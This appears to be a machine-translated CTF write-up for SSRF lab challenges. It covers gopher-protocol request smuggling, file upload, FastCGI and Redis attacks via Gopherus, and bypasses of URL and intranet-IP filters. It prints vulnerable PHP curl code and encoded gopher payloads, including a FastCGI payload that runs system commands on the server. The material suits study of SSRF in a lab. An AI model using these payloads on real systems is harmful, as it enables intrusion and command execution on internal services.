Bypass by protocol

post

open index.php F12 Look at the source code

<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
    
    header("Location: /?url=_");
    exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>

notice header(“Location: /?url=_”); Redirect page to GET To url The content of , According to the prompt, we will construct a POST request

127.0.0.1/flag.php F12 Look at the source code

key=92635644157d7ddc6cf24da0e781978e

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=92635644157d7ddc6cf24da0e781978e

This is in the form of a transmittal package
Then proceed url Triple coding

for the first time url After coding, it is necessary to manually set the code in all %0A prefix %0D, Then carry out subsequent coding
content-length by post Size , namely key Length of value

127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D92635644157d7ddc6cf24da0e781978e
This is incoming url
The color part is personal key Replace it with yours and you can transfer the parameter

And when I make a mistake in passing the parameters in this question, there is a passage like this

ctfhub{b644d27a30b450b2f170c4f19ef1dd85fb1efc5d} This is a Colored eggs flag It has nothing to do with the problem
But there are also several colored eggs
home page official account Topic entry Writeup Tools event The real question Submission
So many egg submissions Where to submit ？

Upload files

You need to upload files this time But there is no submit button in the web page , Modify the source code and add the submit button

<input type="submit" name="submit">

To submit documents , And grab bags
Put this package in the same way as before urlencode Then integrate into the new package

fastcgi

Use gopherus

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH70%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00F%04%00%3C%3Fphp%20system%28%27find%20/%20-name%20flag%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

And then /_ hinder %01…… Code according to the previous method and add the previous gopher://127.0.0.1:9000/_ Merger is payload
obtain flag The position of
And then use gopherus take command Replace with cat flag In the directory
Be careful ： Here are two belts flag Of should cat The file name is followed by a string of numbers

Redis agreement

Also use gopherus
Put... In the same way as before gopher code
Then the ant sword company
![ Insert picture description here ](https://img-blog.csdnimg.cn/c146fb59422e4560862475a8eaac6265.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16

By rewriting url Bypass

URL Bypass

url must startwith “http://notfound.ctfhub.com”

Numbers IP Bypass

127.0.0.1 Can be converted to ：
Hexadecimal = 0x7F000001
Decimal system = 2130706433
You can use ping To verify
And then you splice it like this

302 Jump Bypass

F12 see index.php Code （file:/// The way )

<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
    
    header("Location: /?url=_");
    exit;
}
$url = $_REQUEST['url'];
if (preg_match("/127|172|10|192/", $url)) {
    
    exit("hacker! Ban Intranet IP");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>

Only the numbers are filtered You can use localhost Bypass Hexadecimal bypass can still

DNS Rebinding Bypass

After opening, there is teaching
adopt DNS rebinding. Bind the two domain names